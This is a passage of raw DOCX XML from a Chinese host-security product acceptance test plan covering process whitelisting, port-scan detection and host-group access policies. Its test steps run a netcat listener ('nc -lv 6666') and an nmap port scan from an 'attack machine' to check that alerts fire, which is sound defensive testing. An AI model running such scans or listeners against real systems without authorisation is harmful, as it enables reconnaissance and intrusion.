                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Calibri" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>进程白名单</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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手动添加系统进程到进程白名单(支持一键添加系统进程)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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在主机上运行非系统进程nc -lv 6666 &amp;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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在服务端查看告警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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>服务端查看到nc进程为非授权进程的告警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tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="796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tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="796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tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="796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Align w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc1052997904"/>
      <w:bookmarkStart w:id="121" w:name="_Toc10540"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>扫描防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>扫描防护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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>支持一段时间内对主机多个端口尝试连接的扫描探测行为进行告警。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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.攻击机上安装nmap；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2.测试主机上安装agent，且攻击机与测试主机网络和端口要互通，并开启相应的检测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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="58"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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在服务端设置扫描封禁规则，10秒内</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>响应某个请求连接的端口数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>50个，则冻结该ip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="58"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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在攻击机Oracle-76-02上用nmap扫测试主机Oracle-76-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>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nmap -P 60000-61000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-01)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="58"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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在服务端查看告警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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>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结果1（步骤1-3）：可以看到Oracle-76-01被Oracle-76-02扫描端口的告警，告警详情罗列的端口在60000-61000范围内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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>nmap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测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc10045"/>
      <w:bookmarkStart w:id="123" w:name="_Toc323037601"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>主机组的安全访问策略与规则设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="92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8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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>主机组的安全访问策略与规则设置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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>支持创建策略集，并创建策略集应用的范围（业务组）和策略规则</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>支持设置业务组内的访问策略规则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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>能够根据实际业务，用位置、环境和应用三个标签创建工作组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>—位置：北京</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>环境：测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>应用：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>UASS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>—位置：北京</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>环境：测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>应用：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>SSMC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
